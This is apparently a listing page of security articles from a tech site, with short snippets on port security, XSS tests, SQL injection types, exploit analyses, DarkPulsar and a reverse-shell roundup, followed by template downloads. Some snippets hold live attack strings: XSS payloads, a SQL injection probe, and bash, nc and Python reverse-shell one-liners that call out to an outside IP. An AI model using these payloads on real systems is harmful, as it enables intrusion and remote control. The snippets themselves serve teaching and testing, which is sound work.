current location:Home > Technical Articles > Operation and Maintenance > Safety

  • What is H3C port security technology?
    What is H3C port security technology?
    As the Internet becomes increasingly developed today, security is a topic that must be paid attention to. There are many behaviors that threaten switch ports in enterprises, such as unauthorized user hosts randomly connecting to the enterprise network. For example, if employees own their own laptops, they can unplug the network cable of a certain host without the administrator's consent, plug it into the laptop they brought, and then connect it to the corporate network. This will bring great security risks. , it is very likely to cause the loss of confidential information. Another example is installing hubs and other network equipment without consent. In order to increase the number of network terminals, some employees will do so without authorization. Plug devices such as hubs and switches into the office network interface. In this case, the traffic of the switch interface corresponding to this network interface will increase.
    Safety 1170 2023-05-19 12:46:46
  • Analysis of IPSec instances based on GRE
    Analysis of IPSec instances based on GRE
    IPSecoverGRE
    Safety 1040 2023-05-19 12:40:06
  • How is the small test of xss carried out?
    How is the small test of xss carried out?
    There are no security restrictions, just use alert(/xss/); Restrictions: Only CSS can be used, html tags are not allowed. We know that expression can be used to construct XSS, but it can only be tested under IE, so the following test Please execute in IE6. body{black;xss:alert(/xss/));/*Tested under IE6*/}Restrictions: HTML is escaped and the Image tag is available. The characters input by the test will be inserted into the src address, so you can use a pseudo protocol to bypass it. Directly enter alert(/xss/); or you can use events to bypass it. Just pay attention to the closing statement, as follows: 1&quo
    Safety 1056 2023-05-19 11:37:06
  • Example analysis of bash vulnerability recurrence
    Example analysis of bash vulnerability recurrence
    BourneAgainShell (BASH for short) is the most popular SHELL implementation on GNU/Linux. It was born in 1980. After decades of evolution, it has evolved from a simple terminal command line interpreter into a multi-functional interface deeply integrated with the GNU system. . Bash, a type of Unix shell. The first official version was released in 1989. It was originally planned to be used on the GNU operating system, but it can run on most Unix-like operating systems, including Linux and MacOSXv10.4, which use it as the default shell. It has also been ported to Cygwin and MinGW on Microsoft Windows, or can be used on MS-
    Safety 1358 2023-05-19 11:13:11
  • How zabbix monitors traceroute data
    How zabbix monitors traceroute data
    1. Zabbixserver and proxy install the mtrmtr script and place it in the following path of zabbixserver and proxy: execute chownzabbix:zabbixmtrtrace.shzabbix to create the mtrtrace template: 5. Associate the host to the template and observe the data in zabbix: [monitoring]-[latestdata]:
    Safety 1026 2023-05-19 11:10:12
  • Example analysis of Apache Solr velocity template injection RCE vulnerability
    Example analysis of Apache Solr velocity template injection RCE vulnerability
    0x01 Introduction Solr is an independent enterprise-level search application server that provides an API interface similar to Web-service. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through HttpGet operations and get returned results in XML format. 0x02 Vulnerability Introduction The VelocityResponseWriter component exists in Solr. An attacker can construct a specific request to modify the relevant configuration, so that the VelocityResponseWriter component allows loading of the specified template, which in turn leads to the Velocity template injection remote command execution vulnerability. The attacker exploits this
    Safety 1126 2023-05-19 10:37:13
  • Analysis of an example of using JIRA vulnerability to access the US military's unclassified Internet Protocol router network
    Analysis of an example of using JIRA vulnerability to access the US military's unclassified Internet Protocol router network
    The following describes how the author participated in the U.S. Department of Defense (DoD) Hack the Pentagon vulnerability public testing project and used the JIRA vulnerability CVE-2017-9506 to construct an SSRF attack surface and achieve access to the U.S. military's Non-Confidential Internet Protocol Router Network (NIPRnet), and Combined with other vulnerability techniques, a series of sensitive information of the DoD intranet system was obtained. Due to the confidential nature of the test process and content, this article only touches on this point without disclosing too many technical details and detailed scenarios. It is only for learning and sharing, and I hope readers will bear with me. JIRA is an excellent issue tracking and management software tool developed by the Australian company Atlassian. It can track and manage various types of issues.
    Safety 1131 2023-05-18 22:29:09
  • What are the types of SQL injection?
    What are the types of SQL injection?
    Preface SQL injection attack methods can be divided into explicit injection, error injection and blind injection based on the application processing the content returned by the database. Explicit injection attackers can directly obtain the content they want from the current interface content. The result returned by the error injection database query is not displayed on the page, but the application prints the database error information to the page, so the attacker can construct a database error statement and obtain the desired content from the error information. Blind injection database query results cannot be obtained from the intuitive page. The attacker obtains the desired content by using database logic or delaying the execution of the database library. Mysql manual injection combined injection?id=1'orderby4--
    Safety 2150 2023-05-18 22:05:12
  • What are the rebound shells?
    What are the rebound shells?
    1.bash rebound bash-i>&/dev/tcp/ip_address/port0>&12.nc rebound nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
    Safety 2192 2023-05-18 22:01:04
  • How to use NSA's new APT framework DarkPulsar
    How to use NSA's new APT framework DarkPulsar
    Preface In March 2017, ShadowBrokers released a confidential document that shocked the world, including two frameworks: DanderSpritz and FuzzBunch. DanderSpritz is composed entirely of plugins and is used to gather intelligence, exploit vulnerabilities and manipulate taken over devices. It is written in Java and provides a graphical interface similar to the botnet management panel and a control panel similar to the Metasploit tool. It also incorporates backdoors and plugins for non-FuzzBunch controlled devices. DanderSprit Interface Overview Fuzzbunch provides a framework for different utilities to interact and work together, including various types of plug-ins.
    Safety 1347 2023-05-18 20:14:58
  • How to analyze the Ghostscript SAFER sandbox bypass vulnerability
    How to analyze the Ghostscript SAFER sandbox bypass vulnerability
    Preface Ghostscript is an interpreter software for Adobe PostScript language. It can draw in PostScript language and supports conversion between PS and PDF. Currently, it is installed by default in most Linux distributions and has been ported to Unix, MacOS, Windows and other platforms. Ghostscript is also used by programs such as ImagineMagic, PythonPIL and various PDF readers. Vulnerability description On August 21, Google security researcher Tavis Ormandy disclosed multiple GhostScript vulnerabilities. By constructing malicious PostScript scripts in images, you can bypass
    Safety 1580 2023-05-18 19:10:39
  • DDCTF2019两个逆向分别是什么
    DDCTF2019两个逆向分别是什么
    01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
    Safety 1504 2023-05-18 17:13:20
  • Analysis of examples of bypassing restrictions and accessing Google's internal management systems
    Analysis of examples of bypassing restrictions and accessing Google's internal management systems
    One day, while digging for Google vulnerabilities, I discovered some IP addresses of Google's own services from public vulnerabilities. At first, I really didn't know what these IP addresses could do. I checked these IP addresses first and further discovered that they contained some of Google's internal IPs. I suddenly remembered that recently, my friend KLSREERAM reported a vulnerability related to Google's internal IP, and another friend Vishnu reported a vulnerability that used Google subdomains to access the control panel. Currently, both vulnerabilities have been fixed by Google, and the internal IP addresses related to these two vulnerabilities cannot be accessed from the Internet. But now, with several Google internal IP addresses in front of me, I have to find a way to see if I can
    Safety 1142 2023-05-18 15:19:49
  • How to implement vulnerability analysis of Disk Pulse Enterprise Window application
    How to implement vulnerability analysis of Disk Pulse Enterprise Window application
    1. Vulnerability Introduction DiskPulseEnterprise is a software that monitors disk changes. It can connect and manage the software through a management port 9120 or web management window 80 to monitor disk changes. There is a dynamic link library libspp.dll in DiskPulse Enterprise, which contains some functions responsible for HTTP operations. The problem occurs in this dynamic link library. When processing the post data, there is no strict length control on the post data, resulting in When executing the acquired data, it copies data to invalid memory, causing buffer overflow, triggering SEH abnormal behavior processing, and finally controlling EIP to execute arbitrary code. Software download link: h
    Safety 1138 2023-05-18 15:04:07
  • What is the main reason for APP crash?
    What is the main reason for APP crash?
    1. What kind of scenarios are likely to cause crash problems? Recently, I have been thinking about what kind of problems are likely to cause crashes - that is, having abnormal thinking. For example: I watched an American TV series called "The Rookie" just two days ago. "Police", there is a scene in which the protagonist John Nolan failed to stop the fugitive's car with a police car, causing the fugitive to escape. What is the connection between this scene and the test? First of all, normal people will avoid collisions with others when driving on the road. This is like the main process of testing a function, and they will not make random inputs; but the policeman is different. He will do whatever it takes to catch the fugitive. All methods, this is like abnormal thinking during the testing process, thinking about how to operate the function to make it difficult to use. Guide 1. Abnormal operations Various abnormal operations
    Safety 2523 2023-05-18 13:55:06

Tool Recommendations

jQuery enterprise message form contact code

jQuery enterprise message form contact code is a simple and practical enterprise message form and contact us introduction page code.
form button
2024-02-29

HTML5 MP3 music box playback effects

HTML5 MP3 music box playback special effect is an mp3 music player based on HTML5 css3 to create cute music box emoticons and click the switch button.

HTML5 cool particle animation navigation menu special effects

HTML5 cool particle animation navigation menu special effect is a special effect that changes color when the navigation menu is hovered by the mouse.
Menu navigation
2024-02-29

jQuery visual form drag and drop editing code

jQuery visual form drag and drop editing code is a visual form based on jQuery and bootstrap framework.
form button
2024-02-29

Organic fruit and vegetable supplier web template Bootstrap5

An organic fruit and vegetable supplier web template-Bootstrap5
Bootstrap template
2023-02-03

Bootstrap3 multifunctional data information background management responsive web page template-Novus

Bootstrap3 multifunctional data information background management responsive web page template-Novus
backend template
2023-02-02

Real estate resource service platform web page template Bootstrap5

Real estate resource service platform web page template Bootstrap5
Bootstrap template
2023-02-02

Simple resume information web template Bootstrap4

Simple resume information web template Bootstrap4
Bootstrap template
2023-02-02

Cute summer elements vector material (EPS PNG)

This is a cute summer element vector material, including the sun, sun hat, coconut tree, bikini, airplane, watermelon, ice cream, ice cream, cold drink, swimming ring, flip-flops, pineapple, conch, shell, starfish, crab, Lemons, sunscreen, sunglasses, etc., the materials are provided in EPS and PNG formats, including JPG previews.
PNG material
2024-05-09

Four red 2023 graduation badges vector material (AI EPS PNG)

This is a red 2023 graduation badge vector material, four in total, available in AI, EPS and PNG formats, including JPG preview.
PNG material
2024-02-29

Singing bird and cart filled with flowers design spring banner vector material (AI EPS)

This is a spring banner vector material designed with singing birds and a cart full of flowers. It is available in AI and EPS formats, including JPG preview.
banner picture
2024-02-29

Golden graduation cap vector material (EPS PNG)

This is a golden graduation cap vector material, available in EPS and PNG formats, including JPG preview.
PNG material
2024-02-27

Home Decor Cleaning and Repair Service Company Website Template

Home Decoration Cleaning and Maintenance Service Company Website Template is a website template download suitable for promotional websites that provide home decoration, cleaning, maintenance and other service organizations. Tip: This template calls the Google font library, and the page may open slowly.
Front-end template
2024-05-09

Fresh color personal resume guide page template

Fresh color matching personal job application resume guide page template is a personal job search resume work display guide page web template download suitable for fresh color matching style. Tip: This template calls the Google font library, and the page may open slowly.
Front-end template
2024-02-29

Designer Creative Job Resume Web Template

Designer Creative Job Resume Web Template is a downloadable web template for personal job resume display suitable for various designer positions. Tip: This template calls the Google font library, and the page may open slowly.
Front-end template
2024-02-28

Modern engineering construction company website template

The modern engineering and construction company website template is a downloadable website template suitable for promotion of the engineering and construction service industry. Tip: This template calls the Google font library, and the page may open slowly.
Front-end template
2024-02-28